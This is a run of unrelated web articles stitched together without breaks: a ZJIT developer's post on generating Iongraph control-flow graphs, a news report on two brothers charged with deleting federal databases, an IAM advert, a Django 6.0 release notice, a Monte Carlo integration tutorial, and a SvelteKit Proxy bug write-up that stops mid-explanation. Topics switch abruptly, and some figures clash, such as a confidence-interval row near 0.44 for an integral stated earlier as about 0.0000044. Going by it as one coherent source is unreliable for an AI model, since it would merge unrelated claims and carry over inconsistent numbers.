While idly browsing, I spotted an article by Ben Visness titled Who needs Graphviz when you can build it yourself? , which covers his work on creating a novel graph viewer called Iongraph .
Immediately, I was intrigued. I like looking at new technology and I wondered what it might be like to integrate the work done in Iongraph with ZJIT, getting all sorts of novel and interesting features for free. I suspected that it could also help other engineers to reason about how their optimizations might affect the control flow graph of a given function.
Also, it just looks really cool. It’s got nice colours, good built-in CSS, and is built in a fairly extensible way. The underlying code isn’t hard to read if you need to make changes to it.
Iongraph is compelling for a few reasons.
It supports stable layouts, which means that removing or adding nodes (something that can happen when you run an optimization pass) doesn’t shift the location of other nodes to an extreme degree. Iongraph also gives all sorts of interactive options, like clickable operands, scrollable graphs, or arrow keys to navigate between different nodes.
An especially useful feature is the ability to switch between different compiled methods with a small selector. In our codebase, ZJIT compiles each method on its own, so using a tool like this allows us to inspect method level optimizations all in one pane of a web browser. Of course, there are other great features, like loop header highlighting or being able to click on optimization passes to see what the control flow graph looks like after they’re applied.
Roughly an hour after I read through said article, I noticed that my mentor, Max , had also posted it in an internal team chat, mentioning that it would be cool to support it.
Of course, I was drawn to this project. As is a common trait among interns, I was tempted to take on a new, shiny project despite not knowing what actually developing it would entail. After talking to Max further, he clarified that this would require significant infrastructure work — or at the very least, more than was initially apparent.
Looking into the Iongraph format, I figured that I would have to use some sort of JSON crate. Since ZJIT as a project doesn’t rely strictly on using Rust tooling like cargo , directly adding serde_json as a dependency was out of the question. Another compelling option was vendoring it (or a smaller JSON library), but that was likely to include features that we did not want or introduce licensing issues.
After a quick discussion, I settled on implementing the functionality myself. I read a bit of the JSON specification and got a sense of the ideal way to design the library’s API. Ultimately, I opted for readability and usability over raw performance. I think this decision is reasonable given that the serialization code is not on the critical path of the compiler. The interface is also clean enough that the internals could be replaced later with minimal fuss should more performance be needed.
In designing the serializer, I chose to target RFC 8259 , which provides more freedom than previous specifications. As noted in that RFC, historical specifications constrained the top-level value to be an array or an object, but this spec (and my implementation) doesn’t require that constraint. I also opted to avoid comments, encode strictly in UTF-8, and escape control characters. Notably, RFC 8259 does not impose a limit on the precision of numbers; it only rules out infinity, negative infinity, and NaN .
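To make those constraints concrete, here is a rough illustration in Python (not the actual Rust code in ZJIT) of string escaping and number handling along those lines:

import math

# Illustrative only: emit JSON strings with control characters escaped, and
# reject the numbers RFC 8259 cannot represent.
_ESCAPES = {'"': '\\"', '\\': '\\\\', '\n': '\\n', '\r': '\\r', '\t': '\\t'}

def json_string(s: str) -> str:
    out = ['"']
    for ch in s:
        if ch in _ESCAPES:
            out.append(_ESCAPES[ch])
        elif ord(ch) < 0x20:  # remaining control characters get \u00XX escapes
            out.append(f"\\u{ord(ch):04x}")
        else:
            out.append(ch)  # everything else passes through as UTF-8
    out.append('"')
    return "".join(out)

def json_number(x: float) -> str:
    if math.isnan(x) or math.isinf(x):
        raise ValueError("RFC 8259 has no representation for NaN or infinity")
    return repr(x)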
With JSON serialization handled, the more challenging work was computing the graph metadata that Iongraph requires. The format expects explicit successor and predecessor relationships, loop headers, and back edge sources — information that ZJIT doesn’t normally compute since it’s not needed for compilation at this stage of compiler development.
One constraint I had to contend with was that the Iongraph format needs the user to manually provide the successor and predecessor nodes for a given node in a control flow graph. In ZJIT, we compile individual methods one at a time as Functions (our internal representation) that hold a graph of Blocks. Each Block is a basic block of the kind you would find in a compiler textbook. (One caveat to understand is that we use extended basic blocks, meaning that blocks can have jump instructions at any point in their contained instructions, not just at the end.)
The process of computing successors and predecessors is fairly simple. As you iterate through the list of blocks, every block referenced as the target of a jump-like instruction (whether conditional or unconditional) is added to the current block’s successor set. Then, for each successor, its predecessor set is updated to include the block currently being operated on.
The next task I had to solve was computing the loop headers and back edge sources.
Computing both of these first requires computing the dominators of the blocks in a control flow graph. We say that a block i dominates a block j if all paths in the control flow graph that reach j must go through i . Several algorithms exist for computing dominators, ranging from simple iterative approaches to more complicated ones. I initially heard of a fixed-point iteration that is very straightforward to implement but perhaps not the most efficient; it runs in time quadratic in the number of blocks. In A Simple, Fast Dominance Algorithm by Cooper, Harvey, and Kennedy, both this iterative solution and a version tuned to use less space are described. A third option is the Lengauer-Tarjan algorithm, which has better worst-case bounds than both the iterative and tuned implementations.
Based on the goals of the project, I opted for the iterative algorithm, since it performs well and doesn’t incur serious memory-use penalties for the small number of blocks in a typical control flow graph. It can be described as follows:
dom = {}
nodes.each do |node|
  if entry_nodes.include?(node)
    dom[node] = Set[node]
  else
    dom[node] = nodes.to_set
  end
end

changed = true
while changed
  changed = false
  nodes.reverse_post_order.each do |node|
    preds = predecessors(node)
    pred_doms = preds.map { |p| dom[p] }

    # Intersection of all predecessor dominators
    intersection = if pred_doms.empty?
      Set.new
    else
      pred_doms.reduce(:&)
    end

    # Union with {node}
    new_set = intersection | Set[node]

    if new_set != dom[node]
      dom[node] = new_set
      changed = true
    end
  end
end
Implementing this is fairly simple, and with the limited number of nodes involved it runs quickly enough to be totally acceptable.
To compute successors we use the following snippet:
let successors: BTreeSet<BlockId> = block
    .insns
    .iter()
    .map(|&insn_id| uf.find_const(insn_id))
    .filter_map(|insn_id| {
        Self::extract_jump_target(&function.insns[insn_id.0])
    })
    .collect();
Here we go through all the instructions in a given block. We use a union find data structure to map instructions to their canonical representatives (since some optimizations may have merged or aliased instructions). We then filter with extract_jump_target , which returns an Option that contains a BlockId for jump-like instructions.
After finding successors, we can set the predecessors by iterating through the nodes in the successor set and adding the current node to their predecessor sets.
The last important thing we need to compute is the loop depth.

To find it, we first need to understand how to identify a natural loop.
We identify natural loops by detecting back edges. A back edge occurs when a block has a predecessor that is dominated by that block (all paths to the predecessor pass through this block). When we find such an edge, the target block is a loop header and the predecessor is the source of a back edge. The natural loop consists of all blocks on paths from the back edge source to the loop header (excluding the header itself). Each block within this natural loop then has its loop depth incremented.
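As a rough sketch of that procedure (in Python for illustration, not the actual ZJIT Rust code), assuming preds and dom are the predecessor sets and dominator sets computed above:

# Illustrative only: find back edges, collect each natural loop body by
# walking predecessors from the back edge source, and bump the loop depth
# of every block in the body (excluding the header itself).
def loop_depths(blocks, preds, dom):
    depth = {b: 0 for b in blocks}
    for header in blocks:
        for source in preds[header]:
            if header in dom[source]:  # back edge: source -> header
                body, stack = set(), [source]
                while stack:
                    b = stack.pop()
                    if b == header or b in body:
                        continue
                    body.add(b)
                    stack.extend(preds[b])
                for b in body:
                    depth[b] += 1
    return depth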
These additional computations are used by the Iongraph layout engine to determine where a given block should sit vertically and where lines should be routed within the graph. Loop headers and back edge sources are also marked!
You can click around this demo graph showing a simple example from ZJIT to get a sense of how Iongraph works! Operands are clickable to get to their definition. You can click on the phases of optimization on the left side - note that only the non-grayed out passes will have made changes. The graph is also zoomable and scrollable!
Hopefully this post was educational! I learned a lot implementing this feature and enjoyed doing so.
If you would like to do some work on ZJIT (and learn a lot in the process), you are welcome to make pull requests to github.com/ruby/ruby/ with the commit prefix ZJIT: . You can find issues here .
Also, feel free to join our Zulip !
U.S. prosecutors have charged two Virginia brothers arrested on Wednesday with allegedly conspiring to steal sensitive information and destroy government databases after being fired from their jobs as federal contractors.
Twin brothers Muneeb and Sohaib Akhter, both 34, were previously sentenced to several years in prison in June 2015, after pleading guilty to accessing U.S. State Department systems without authorization and stealing personal information belonging to dozens of co-workers and a federal law enforcement agent who was investigating their crimes.
Muneeb Akhter also hacked a private data aggregation company in November 2013 and the website of a cosmetics company in March 2014.
After serving their sentences, they were rehired as government contractors and were indicted again last month on charges of computer fraud, destruction of records, aggravated identity theft, and theft of government information.
"Following the termination of their employment, the brothers allegedly sought to harm the company and its U.S. government customers by accessing computers without authorization, issuing commands to prevent others from modifying the databases before deletion, deleting databases, stealing information, and destroying evidence of their unlawful activities," the Justice Department said in a Wednesday press release .
According to court documents , Muneeb Akhter deleted roughly 96 databases containing U.S. government information in February 2025, including Freedom of Information Act records and sensitive investigative documents from multiple federal agencies.
One minute after deleting a Department of Homeland Security database, Muneeb Akhter also allegedly asked an artificial intelligence tool for instructions on clearing system logs after deleting a database.
The two defendants also allegedly ran commands to prevent others from modifying the targeted databases before deletion, and destroyed evidence of their activities. The prosecutors added that both men wiped company laptops before returning them to the contractor and discussed cleaning out their house in anticipation of a law enforcement search.
The complaint also claims that Muneeb Akhter stole IRS information from a virtual machine, including federal tax data and identifying information for at least 450 individuals, and stole Equal Employment Opportunity Commission information after being fired by the government contractor.
Muneeb Akhter has been charged with conspiracy to commit computer fraud and destroy records, two counts of computer fraud, theft of U.S. government records, and two counts of aggravated identity theft. If found guilty, he faces a minimum of two years in prison for each aggravated identity theft count, with a maximum of 45 years on other charges.
His brother, Sohaib, is charged with conspiracy to commit computer fraud and password trafficking, facing a maximum penalty of six years if convicted.
"These defendants abused their positions as federal contractors to attack government databases and steal sensitive government information. Their actions jeopardized the security of government systems and disrupted agencies' ability to serve the American people," added Acting Assistant Attorney General Matthew R. Galeotti of the DOJ's Criminal Division.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
The Django team is happy to announce the release of Django 6.0.
The release notes assemble a mosaic of modern tools and thoughtful design. A few highlights are:
You can get Django 6.0 from our downloads page or from the Python Package Index .
The PGP key ID used for this release is Natalia Bidart: 2EE82A8D9470983E
With the release of Django 6.0, Django 5.2 has reached the end of mainstream support. The final minor bug fix release, 5.2.9 , was issued yesterday. Django 5.2 will receive security and data loss fixes until April 2028. All users are encouraged to upgrade before then to continue receiving fixes for security issues.
Django 5.1 has reached the end of extended support. The final security release, 5.1.15 , was issued on Dec. 2, 2025. All Django 5.1 users are encouraged to upgrade to a supported Django version.
See the downloads page for a table of supported versions and the future release schedule.
I read Burghelea’s article on the Feynman trick for integration . Well, I’m not good enough at analysis to follow along, but I tried reading it anyway because it’s fascinating.
For people who do not have experience with analysis, integration is counting the total size of very many, very small piles of things. Analytical integration, i.e. the process by which we can get an exact result, can be very difficult. It often takes knowledge of special tricks, strong pattern recognition, and plenty of trial and error. Fortunately, in all cases in my career when I’ve needed the value of an integral, an approximate answer has been good enough.
In practical terms, this means we could spend a lot of time learning integration tricks, practice using them, and then take half an hour out of our day to apply them to an integral in front of us … or, hear me out, or, we could write four lines of JavaScript that arrive at a relatively accurate answer in less than a second.
If integration is summing many small piles, we have to figure out how big the piles are. Their height is usually given by a mathematical function, and our first example will be the same as in the Feynman trick article.
\[f(x) = \frac{x - 1}{\ln{x}}\]
This is to be integrated from zero to one, i.e. we want to know the size of the shaded area in the plot below. You can think of each column of shaded pixels as one pile, and we sum the size of all of them to get the total area. 1 Of course, this is an svg image so there are no columns of pixels. Alternatively, the more we zoom in, the thinner the columns become – but the more of them there are. This is why we need integration: it’s dealing with the limit case of infinitely many, infinitely thin columns.
We could imagine drawing six random numbers between zero and one, and plotting piles of the corresponding height at those locations. Since there are six piles, their width is one sixth of the width of the area we are integrating.
Even though some of these piles overlap by chance, and even though there are some random gaps between them, the sum of their areas (0.66) comes very close to the actual shaded area determined analytically (0.69). If we draw more piles, we have to make them correspondingly thinner, but the agreement between their sum and the total size of the area improves.
These are 100× as many piles, and they’re 1/100th as thick to compensate. Their total area is 0.70 – very close to 0.69. If we draw even more piles, we’ll get even closer.
This illustrates a neat correspondence between integrals and expected values. In the simple case, we can frame it mathematically as
\[\int_a^b f(x) \,\mathrm{d}x = (b - a)\, E\!\left[f(X)\right], \qquad X \sim \mathrm{Uniform}(a, b)\]
In words, this says that integrating the function \(f\) between \(a\) and \(b\) is the same as taking the expected value of \(f\) at uniformly distributed random points between \(a\) and \(b\), scaled by the width \(b - a\) of the interval.
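Replacing that expectation with a plain sample average gives the estimator the code below implements (a standard Monte Carlo sketch, with \(N\) the number of samples):
\[\int_a^b f(x)\,\mathrm{d}x \approx \frac{b - a}{N} \sum_{i=1}^{N} f(x_i), \qquad x_i \sim \mathrm{Uniform}(a, b)\]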
Here’s a JavaScript function that estimates the value of an integral in the most primitive way possible.
I = (B, lo, hi, f) => {
// Generate B random values uniformly between lo and hi.
let xs = Array.from({length: B}, _ => lo + (hi - lo) * Math.random());
// Compute the value of f at each location.
let ys = xs.map(f);
// Return the total area of all the piles combined.
return (hi-lo)*ys.reduce((r, y) => r + y, 0)/ys.length;
}
To compute an approximation to the value of the integral we’ve seen, we run
I(10_000, 0, 1, x => (x-1)/Math.log(x) );
0.6916867623261724
This is fairly close to 0.69. And we got there in four lines of JavaScript, as promised.
We can try this on the next example too. Now we’re asking about the integral
\[\int_0^{\frac{\pi}{2}} \frac{\ln{(1 - \sin{x})}}{\sin{x}} \mathrm{d}x\]
which, translated to JavaScript, becomes
I(10_000, 0, Math.PI/2, x => Math.log(1 - Math.sin(x))/Math.sin(x) );
-3.67
This is again fairly close to the desired −3.7, but not quite there yet. The tricky shape of the function is the reason we aren’t getting as close as we want.
At the upper endpoint of the integration interval, this function goes to negative infinity. The random piles we draw come primarily from the well behaved region of the function, and thus don’t help the computer realise this behaviour.
There are clever ways to sample adaptively from the trickier parts of the function, but an easy solution is to just visually find a breakpoint, split the interval on that, and then estimate the sensible part separately from the crazy-looking part. Since the total area must be the sum of both areas, we can add their results together for a final estimation.
In this case, we might want to pick e.g. 1.5 as the breakpoint, so we combine the area estimations from 0–1.5 and then 1.5–\(\frac{\pi}{2}\). The result is
I(2_000, 0, 1.5, x => Math.log(1 - Math.sin(x))/Math.sin(x)) + I(8_000, 1.5, Math.PI/2, x => Math.log(1 - Math.sin(x))/Math.sin(x));
-3.70
which is indeed much closer to the actual value of −3.7.
Note that we aren’t taking more samples, we’re just sprinkling them more wisely over the number line. We spend 2,000 samples in the relatively well-behaved region where the function takes values from −1 to −6, and then we spend the other 8,000 samples in the small region that goes from −6 to negative infinity. Here it is graphically:
The reason this helps us is that this latter region contributes a lot to the value of the integral, but it is so small on the number line that we benefit from oversampling it compared to the other region. This is a form of sample unit engineering, which we have seen before in different contexts.
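If this split-and-add pattern comes up a lot, it can be wrapped in a tiny helper. This is my own convenience sketch, not from the original post; Isplit is a made-up name that reuses the I estimator defined above:
Isplit = (B1, B2, lo, brk, hi, f) =>
  // Estimate [lo, brk] with B1 samples and [brk, hi] with B2 samples,
  // then add the two partial areas together.
  I(B1, lo, brk, f) + I(B2, brk, hi, f);
With it, the earlier call reads Isplit(2_000, 8_000, 0, 1.5, Math.PI/2, x => Math.log(1 - Math.sin(x))/Math.sin(x)).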
We can continue with some more examples from the Feynman trick article. That gets us the following table.
| Integral | Value | Estimation | Difference | Notes |
|---|---|---|---|---|
| \(\int_0^1 \frac{x-1}{\ln{x}} \mathrm{d}x\) | \(\ln{2}\) | 0.6943 | 0.2 % | |
| \(\int_0^{\frac{\pi}{2}} \frac{\ln{(1 - \sin{x})}}{\sin{x}} \mathrm{d}x\) | \(\frac{-3 \pi^2}{8}\) | -3.702 | < 0.1 % | |
| \(\int_0^1 \frac{\ln{(1 - x + x^2)}}{x - x^2} \mathrm{d}x\) | \(\frac{-\pi^2}{9}\) | -1.097 | < 0.1 % | |
| \(\int_0^{\frac{\pi}{2}} \frac{\arctan{(\sin{x})}}{\sin{x}} \mathrm{d}x\) | \(\frac{\pi}{2}\log{(1 + \sqrt{2})}\) | 1.385 | < 0.1 % | |
| \(\int_0^\infty x^2 e^{-\left(4x^2 + \frac{9}{x^2}\right)} \mathrm{d}x\) | \(\frac{13 \sqrt{\pi}}{32 e^{12}}\) | 0.000004414 | 0.2 % | (1) |
| \(\int_0^1 \frac{\ln{x}}{1 - x^2} \mathrm{d}x\) | \(\frac{-\pi^2}{8}\) | -1.227 | 0.5 % | (2) |
| \(\int_0^\infty \frac{e^{-x^2}}{1 + x^2} \mathrm{d}x\) | \(\frac{\pi e}{2}\mathrm{erfc}(1)\) | 0.6696 | 0.3 % | (3) |
Notes:
“Now,” the clever reader says, “this is all well and good when we have the actual value to compare to so we know the size of the error. What will we do if we’re evaluating a brand new integral? What is the size of the error then, huh?”
This is why we sampled the function randomly. That means our approximation is a statistical average over samples, and for that we can compute the standard error of the mean. In the JavaScript implementation below, we use the quick variance computation, but we could perhaps more intuitively have used the SPC-inspired method.
Ic = (B, lo, hi, f) => {
let xs = Array.from(
{length: B}, _ =>
lo + (hi - lo) * Math.random()
);
let ys = xs.map(f);
// Compute the variance of the ys from the sum and
// the sum of squared ys.
let s = ys.reduce((r, y) => r + y, 0);
let ssq = ys.reduce((r, y) => r + y**2, 0);
let v = (ssq - s**2/B)/(B-1);
// Compute the mean and the standard error of the mean.
let m = (hi-lo)*s/B;
let se = (hi-lo)*Math.sqrt(v/B);
// Compute the 90 % confidence interval of the value of
// the integral.
return {
p05: m - 1.645*se,
p95: m + 1.645*se,
}
}
If we run this with the first integral as an example, we’ll learn that
Ic(10_000, 0, 1, x => (x-1)/Math.log(x) )
Object {
p05: 0.6896
p95: 0.6963
}
Not only is this range an illustration of the approximation error (small!), it is also very likely to capture the actual value of the integral. Here are some more examples from the same integrals as above:
| 5 % | 95 % | Actual | Contained? |
|---|---|---|---|
| 0.6904 | 0.6972 | 0.6931 | ✅ |
| -3.7673 | -3.6787 | -3.7011 | ✅ |
| -1.0975 | -1.0960 | -1.0966 | ✅ |
| 1.3832 | 1.3871 | 1.3845 | ✅ |
| 0.4372 | 0.4651 | 0.4424 | ✅ |
| -1.2545 | -1.2254 | -1.2337 | ✅ |
| 0.6619 | 0.6937 | 0.6716 | ✅ |
These are all built naïvely from 10,000 uniform samples. In other words, in none of the cases has the computation been split up to allocate samples more cleverly.
Again, we could spend a lot of time learning to integrate by hand … or we could ask the computer for less than a second of its time first, and see whether the accuracy it achieves is appropriate for our use case. In my experience, it generally is.
What’s neat is we can still split up the computation like we did before, if we believe it will make the error smaller and the confidence interval narrower. Let’s use the following integral as an example.
\[\int_0^\infty \frac{\sin{x}}{x} \mathrm{d}x\]
This oscillates up and down quite a bit for small \(x\), and then decays but still provides significant contributions for larger \(x\). A naive evaluation would have a confidence interval of
Ic(10_000, 0, 100, x => Math.sin(x)/x)
Object {
p05: 1.461
p95: 1.884
}
and while this is certainly correct 2 The actual value of the integral is half \(\pi\), or approximately 1.571. , we can do better. We’ll estimate the region of 0–6 separately from 6–100, using half the samples for each 3 Why put the break point at 6? The period of sin is a full turn, which is roughly 6 radians. This ensures we get roughly symmetric contributions from both integrals. That’s not necessary for the technique to work, but it makes the illustration a little cleaner. :
Ic(5_000, 0, 6, x => Math.sin(x)/x)
Object {
p05: 1.236
p95: 1.468
}
This contains the bulk of the value of the integral, it seems. Let’s see what remains in the rest of it.
Ic(5_000, 6, 100, x => Math.sin(x)/x)
Object {
p05: 0.080
p95: 0.198
}
We can work backwards to what the standard errors must have been to produce these confidence intervals. 4 The midpoint is the point estimation for each region, and the standard error is 1/1.645 times the distance between the 5 % point and the midpoint.
| Region | Value | Standard error |
|---|---|---|
| 0–6 | 1.4067 | 0.0372 |
| 6–100 | 0.1390 | 0.0359 |
The estimate of the total area is the two values summed, i.e. 1.5457. The standard error of this sum we get through Pythagorean addition, and it is approximately 0.05143. We convert it back to a confidence interval and compare with the case where we did not break the computation up into multiple components.
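Here’s a rough sketch of that bookkeeping in code (my own helper, not from the post): it recovers the point estimate and standard error from each Ic result, adds the point estimates, combines the standard errors in quadrature, and reports a combined 90 % interval.
combineIc = (a, b) => {
  // The midpoint of a 90 % interval is the point estimate; the standard
  // error is the half-width divided by 1.645.
  const mean = ci => (ci.p05 + ci.p95) / 2;
  const se = ci => (ci.p95 - ci.p05) / (2 * 1.645);
  // Point estimates add; standard errors add in quadrature (Pythagorean addition).
  const m = mean(a) + mean(b);
  const s = Math.sqrt(se(a)**2 + se(b)**2);
  return { p05: m - 1.645*s, p95: m + 1.645*s };
}
Feeding it the two Ic results above reproduces the “two operations” row in the comparison below.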
| Method | 5 % | 95 % | Range |
|---|---|---|---|
| Single operation (10,000 samples) | 1.461 | 1.884 | 0.423 |
| Two operations (5,000 samples × 2) | 1.461 | 1.630 | 0.169 |
Although in this case the two methods happen to share a lower bound, the upper bound has been dramatically reduced. The total range of the confidence interval is more than halved! This was because we allocated the samples more cleverly – concentrated them in the early parts of the function – rather than increased the number of samples.
That said, we’re at a computer, so we could try increasing the sample count. Or maybe both?
| Method | 5 % | 95 % | Range |
|---|---|---|---|
| Single operation (10,000 samples) | 1.461 | 1.884 | 0.423 |
| Two operations (5,000 samples × 2) | 1.461 | 1.630 | 0.169 |
| Single operation (100,000 samples) | 1.549 | 1.680 | 0.131 |
| Two operations (50,000 samples × 2) | 1.524 | 1.578 | 0.054 |
It seems like sampling more cleverly has almost the same effect as taking ten times as many samples.
We could play around with where to put the breakpoint, and how many samples to allocate to each side of it, and see which combination yields the lowest error. Then we can run that combination with a lot of samples to get the most accurate final result. That would take maybe 15 minutes of tooting about and exploring sensible-seeming alternatives, so it’s probably still quicker than integrating by hand.
It should be said that there are times when numeric solutions aren’t great. I hear that in electronics and quantum dynamics, there are sometimes integrals whose value is not a number, but a function, and knowing that function is important in order to know how the thing it’s modeling behaves in interactions with other things.
Those are not my domains, though. And when all we need is a number, the computer beats Feynman any day of the week.
I came across a pretty gnarly/fun bug in my Svelte project recently that had me scratching my head for a while and turned out to be a bug in SvelteKit itself, so I thought I’d write up the process I went through in finding, debugging, and fixing it.
Hopefully, someone will find this useful if they come across a similar issue (this includes me in 3 months time when I’ve forgotten all about this).
There didn’t seem to be a lot around it when I was frantically Googling it during the early phases of “why is this happening to me???”, anyway.
I’ve got a medium-sized SvelteKit app that I’ve been working on-and-off for a few years now (maybe 50k SLOC across a few hundred files) and I recently (finally) took the plunge to update it from Svelte 4 to Svelte 5. It was a pretty painful few days, but at the end of it, I had my app working locally with runes enabled on every single page and component.
There was just one issue – when I pushed my code up to the staging server, it didn’t work :-(
And when I say “didn’t work”, I mean not a single page would load. Not even the main layout would load.
It’s basically impossible to debug an issue in production or even on a staging server, so the first thing was to figure out why, given this issue was 100% reproducible and unavoidable by visiting any page on the staging server, I wasn’t seeing anything wrong when running it locally.
So what’s the difference between how this is running locally and in prod/staging? Who are the main suspects in this murder mystery where my staging server is the tragic victim?
Well, the main thing is that when I run it locally, I use pnpm dev, whereas in prod, I use the Node Adapter running inside Docker. This narrows it down somewhat – here are the main suspects:
The staging server gives me no information in the interface/browser console, but if I dig through the container logs I can see a single error message:
Unable to retrieve user dashboard: TypeError: Cannot read private member #state from an object whose class did not declare it
at Proxy.clone (node:internal/deps/undici/undici:10027:31)
at UsersApi.fetchApi (file:///app/build/server/chunks/runtime-BIi4o4oJ.js:170:30)
at process.processTicksAndRejections (node:internal/process/task_queues:103:5)
at async UsersApi.request (file:///app/build/server/chunks/runtime-BIi4o4oJ.js:90:22)
at async UsersApi.getCurrentUserDashboardRaw (file:///app/build/server/chunks/UsersApi-D2Mg9-4e.js:110:22)
at async UsersApi.getCurrentUserDashboard (file:///app/build/server/chunks/UsersApi-D2Mg9-4e.js:126:22)
at async load (file:///app/build/server/chunks/12-CIrAv-H7.js:16:23)
at async fn (file:///app/build/server/index.js:3022:14)
at async load_data (file:///app/build/server/index.js:3013:18)
at async file:///app/build/server/index.js:4639:18
Ahah, our first clue! 🔎
Okay, so it looks like the frontend is trying to hit the REST API to get user information to load the main dashboard, and it’s hitting an error inside some internal node dependency called “undici” 🤔
This is a bit weird – my code is the next stack up, in UsersApi.fetchApi – this code is auto-generated using OpenAPI Generator’s typescript-fetch generator, meaning it has been auto-generated from the OpenAPI specification of my REST API. That hasn’t changed in the recent upgrade, so it must be one of the dependencies that I updated…
This is all a bit weird as the actual error is happening inside an internal node dependency, undici . I haven’t bumped my Node version itself so this clue confuses me greatly.
Let’s check out my code that’s creating the error. The stack trace is from a prod build so it’s giving me a line number from the built chunk, but that’s fine. Here’s the code:
163  ...
164  for (const middleware of this.middleware) {
165    if (middleware.post) {
166      response = await middleware.post({
167        fetch: this.fetchApi,
168        url: fetchParams.url,
169        init: fetchParams.init,
170        response: response.clone()
171      }) || response;
172    }
173  }
174  ...
Okay, so response.clone() is where the error is happening. The response object is an instance of Response coming from fetch(), which is what the undici library provides, but the stack trace doesn’t say Response.clone(), it says Proxy.clone()… Another mystery 🤔
But what does the actual error mean? Apparently I have been living under a TypeScript rock for the last few years, because I don’t think I’ve ever actually seen anyone using #my-element in JavaScript before, even though it’s been deployed to V8 since 2019.

Anyway, if you have a class in JavaScript with an element (MDN says not to call them properties because property implies some attributes which these private elements don’t have, but you can mentally replace “element” with “field or method”) whose name starts with #, the JavaScript runtime enforces that this element cannot be accessed from outside the class – they are private.
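As a quick, throwaway illustration of that enforcement (my own example, not from the post; Counter and #count are made-up names):
class Counter {
  // Private field: only code inside Counter can read or write it.
  #count = 0;

  increment() {
    return ++this.#count; // fine, we're inside the class
  }
}

const c = new Counter();
c.increment();  // 1
// c.#count;    // SyntaxError: private fields can't even be referenced outside the class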
This kind of makes sense – the stack trace says Proxy.clone(), not Response.clone(), but it is the undici Response class that defines the private #state field. You can see the code for yourself on nodejs/undici. The Proxy class isn’t allowed to see the Response class’s privates – they just don’t have that kind of relationship.
So now the question is: who’s doing the proxying???
Like Dr. House barely 10 minutes into the episode 1 , I was convinced that Sentry was the culprit – I had updated the library and the update was doing something stupid. As an error handling/tracing library, it must be proxying the response so that it can determine whether it is an error response to report back to the Sentry server.
It’s perfect – it fits all the symptoms and explains why I’m not seeing the issue locally (I disable Sentry in local dev environment). 2
As such, I prescribed an immediate Sentry-ectomy, removing all the Sentry code whatsoever and pushing the update up to staging, confident that my clinical intervention would immediately resolve the issue and reveal the culprit as Sentry.
The result? Still broke. The patient was still dying. The murderer remained at large. The dominoes of my Sentry theory had fallen like a house of cards – checkmate.
At this point I thought that it must be something to do with running inside Docker or using the Node Adapter, so I:
- pnpm build and node --env-file=.env build – no issue.
- docker build -t my-app . and docker run --network=host --rm --env-file=.env my-app – no issue.
This was getting weird now.
At this point, we need more clues. This is probably the bit of the episode where Dr. House intentionally makes the patient worse to try to figure out what the underlying issue is.
Luckily, we have a more precise surgical tool to figure out who is using Proxy, and the answer is… Proxy.
What exactly does Proxy do? Well, if you want to attach additional functionality to a pre-existing class or function, you can wrap it in a proxy and insert your own code into the process. This is especially useful for things like tracing, which is why I (unfairly) blamed Sentry earlier.
Here’s an example:
const originalLog = console.log;
console.log = new Proxy(originalLog, {
  apply(target, thisArg, args) {
    const convertedArgs = args.map(arg => {
      if (typeof arg === 'string') {
        return arg
          .split('')
          .map((char, i) => (i % 2 === 0 ? char.toLowerCase() : char.toUpperCase()))
          .join('');
      }
      return arg;
    });

    return Reflect.apply(target, thisArg, convertedArgs);
  }
});
So what does this strange-looking code do? Let’s try it out:
» console.log("The quick brown fox jumps over the lazy dog")
← tHe qUiCk bRoWn fOx jUmPs oVeR ThE LaZy dOg
Now you can successfully make everything that logs to your console sound ✨ sardonic and disingenuous ✨ I call it spongelog (trademark pending).
For those of you lucky enough not to have come across Reflect and/or apply yet: invoking a function like myClass.doSomethingNow(arg1, arg2) is the same as doing myClass.doSomethingNow.apply(myClass, [arg1, arg2]), which is also the same as doing myClass.doSomethingNow.call(myClass, arg1, arg2), which is the same as Reflect.apply(myClass.doSomethingNow, myClass, [arg1, arg2])… Yeah, this is what JavaScript is like. Keep adding newer, more “modern” ways of doing the same things without ever removing the old ways.
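To make those equivalences concrete, here’s a tiny sanity check with a made-up class (Greeter and greet aren’t from the post); all four calls return the same string:
class Greeter {
  greet(name, punctuation) {
    return `Hello, ${name}${punctuation}`;
  }
}

const g = new Greeter();

g.greet("Ada", "!");                      // "Hello, Ada!"
g.greet.apply(g, ["Ada", "!"]);           // same
g.greet.call(g, "Ada", "!");              // same
Reflect.apply(g.greet, g, ["Ada", "!"]);  // same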
So how can we proxy-ception our response to find our culprit?
const OriginalProxy = Proxy;
globalThis.Proxy = new Proxy(OriginalProxy, {
  construct(target, args, newTarget) {
    // We are proxying the creation of a proxy, so the first arg to the
    // constructor is the object we're proxying. We only care about code
    // that's proxying the response.
    const proxiedClass = args[0].constructor.name;
    if (proxiedClass === "Response") {
      console.trace("Creating response Proxy");
    }
    return Reflect.construct(target, args, newTarget);
  },
});
This time we are intercepting the constructor of the Proxy class so that we can find what piece of code is doing new Proxy(response, ...). When you do new Proxy(), the first argument is the thing we’re proxying, so we want to find whoever is calling new Proxy() with a first argument that is an instance of the Response class from undici – we can do this by getting the name of the constructor, which is the same as the name of the class. (It’s possible that there’s another class called Response elsewhere in the code, but unlikely.)

Don’t be silly and accidentally put this code somewhere where it runs on every request, or you’ll end up with an exponential explosion of console.trace calls as each new proxy triggers the other proxies and adds another trace to the pile, like the logging equivalent of a nuclear bomb… Not that I did that or anything, that would be stupid haha…
Here’s the single trace that showed:
Trace: Creating response Proxy
at Object.construct (.../src/hooks.server.ts:20:17)
at universal_fetch (.../node_modules/.pnpm/@[email protected]_@[email protected]_@[email protected]_svelte_1a81703e589b392db9a0fd6d8f25cd68/node_modules/@sveltejs/kit/src/runtime/server/page/load_data.js:331:17)
at process.processTicksAndRejections (node:internal/process/task_queues:105:5)
The first frame at hooks.server.ts is just where my code that is creating my proxy-ception is running, so we can ignore that. The culprit is @sveltejs/kit/src/runtime/server/page/load_data.js.
Here’s an abbreviation of what the code is doing:
const proxy = new Proxy(response, {
  get(response, key, _receiver) {
    // Lots of SvelteKit-specific functionality which isn't relevant for us
    // ...

    return Reflect.get(response, key, response);
  }
});
So what’s this all about then?
So what’s the issue with this? Well, prior to my raising a bug in the SvelteKit repo, there was precisely one mention of this specific bug: nodejs/undici#4290, which explains that when you proxy an object that has methods, doing obj[key] or Reflect.get(obj, key, obj) will get the method from the object 3 but it will not bind the resulting method to obj. Normally, this doesn’t matter, but when you’re proxying an object, this will be bound not to the object but to the proxy instance itself.

